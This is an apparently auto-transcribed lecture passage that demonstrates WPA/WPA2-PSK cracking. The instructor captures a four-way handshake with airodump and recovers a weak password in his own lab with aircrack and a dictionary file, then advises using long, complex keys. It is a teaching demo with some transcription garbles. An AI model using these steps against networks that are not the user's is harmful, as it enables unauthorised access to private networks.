WPA and WPA two are very good. encryptions. If you're using WPA, you're using RC four, but you're using t Kip with that. And if you're using WPA two, while you're using it, yes was ccmp. And you are not going to be able to crack these passwords except for one little problem. And the problem is, is the initial connection between a wireless WPA or WPA two client to an access point has what we call a four way handshake.
And not that many years ago, there was a small weakness discovered in this four way handshake that allows us to do something very interesting. Now I need to be careful here. When you're cracking WEP you can mathematically derive the password just by looking at packets. You can't do that with WPA and WPA two. With WPA and WPA two, think more instead that you've got this guy who's really good at turning the numbers on a bicycle lock and then pull on it. So you can go to this guy and say, Hey, try 0000.
And he could do that real quick and pull on it. So if you wanted to, you could tell this guy start with all zeros, and then just keep going to go to 9999. Now if there was only that would be 10,000 different permutations, that would work great, but with WPA WPA to take that same bike lock analogy, and turn it from four digits to like 128 digits. So it would take that guy, even if he was fast, a very, very long time to go through all these. Luckily for us, we know that human beings don't use good randomized long passwords. We know that most human beings are going to use like a phrase, and then a number or their pet's name and then the date they were born or the number of kids they have and their wife's name and the date that they got married.
Little simple things like that. And if we know that, we can tell the guy who spinning on that bicycle lock. No, no, no, don't start at the zeros. Just try all of these first. So we've got to give this WPA WPA two cracker, what we call a dictionary file. Now a dictionary file is nothing more than a big text file that is full.
And I mean, full of 10s of millions of different types of permutations of well known words with numbers and all kinds of different things. Now you think, well, 10s of millions, well, compared to 120, eighth power stuff, 10 million, even my laptop, give it a day could knock all that stuff out. So that makes a big difference. So what we're going to be doing with WPA, WPA two, is we're going to go ahead and grab not a whole bunch of packets. What we're going to grab is those four way handshakes when people start to connect. And using that we can derive the passwords by using a dictionary file, basically saying try all these and if people use it, then we're going to have them so Let's go ahead and start off by Let me show you how the setup works this time.
So I've got my same wireless access point. Now he's still set to WEP at this moment, so we're going to change him to regular old, just WPA PS K, and get him up and running. And we'll put a really weak password on here, then we're going to go back over to the Kali box. And in this case, what we're going to do is we're still going to monitor the traffic, but we're just going to wait for somebody to authenticate, and we gotta run the cracker. And with luck, since it's a weak password, we're going to be able to get it pretty easily. So let's take a look at the setup.
Alright, so let's go over here. And first of all, instead of calling it non secure web, let's call it not secure WPA. And let me apply that. Well wait a second. Now the next thing I'm going to do is go over to wireless security. And we're going to take off WEP and let's go to WPA personal this type of attack will work with WPA or WPA two personal shared key.
So I've already got a password in here and I want to keep it down the password is Timmy Timmy. So it's a pretty simple password. It's just a very common word used twice. So let me go ahead and apply all this. We'll save it. And we're pretty much ready to go.
So this guy is now WPA personal. He has a very simple password of Timmy, Timmy. And now what we're going to do is go over here, we're going to grab a bunch of data, but in particular, we're not just grabbing data, we're looking for handshakes, and that's where arrow dump does a great job. Let me show you. Now what I've got here is I've got arrow dump, still running on my screen. Now if you take a look right here at top, you're going to see there's not secure WPA, you can even see that it's WPA.
And it's running Tip, no great surprise there, and there's the MAC address for it. So what we're going to do now is let's start arrow dump. And we're going to watch for handshakes. I'm going to put all the stuff that it finds into a file called WP a file. And this guy's on Channel six and the BSS ID is 20 colon, a colon, four, the colon four, two Colon Four, three, colon, eight. And we're going to tell them to listen on w land zero, mon.
So what we're going to do now is just keep watching this and see if somebody comes in. There it is. Wow, that was really quick. Let's rewind that a little bit so we can see it. What we just saw there was a handshake and flashed really, really quick. So I kind of missed it.
But what we now know is that we have a file of captures that include at least one if not two handshakes. I got a bunch of people in the studio all trying to connect at the same time. So hopefully we got a bunch. So let's go ahead and take a look at that file. And go ahead and see if we can pull the password out. So we can go ahead and just turn this off.
And let me make sure we've got a dictionary file in there. There is way up at the top you see the word dictionary, that's a dictionary file that I've created. So to actually go about the cracking, is we just go ahead and run aircrack A to means I'm doing a W pa attack on this guy. So I got to tell it where my dictionary file is. It's right here in the same folder, so I just type in dictionary. And then I tell it which file I want to crack.
In this case, it's going to be WPA file, dash 01 Ca p in enter tada there it is right there see it? Timmy Timmy pretty easy stuff now you'd be looking at this you're gonna wait a minute wait wait wait wait wait like you put the right password into your dictionary follow? Yeah, I did but I did that just to speed up this demonstration. Trust me there are huge dictionary files and there they got Timmy Timmy in there just as easily. If you have a weak WPA or WPA two pFk odds are good that people be able to crack it almost as quickly as what I've done right here. The right answer is simple.
Use long, complex, private shared keys when you're dealing with WPA and WPA two. A lot of people recommend don't use any human words. And make sure you use at least 20 characters which can sometimes be long to remember, but boy does it make it secure. Okay, so now that we've cracked WEP and WPA, a WPA two, we can actually make life lot easier cracking with WPS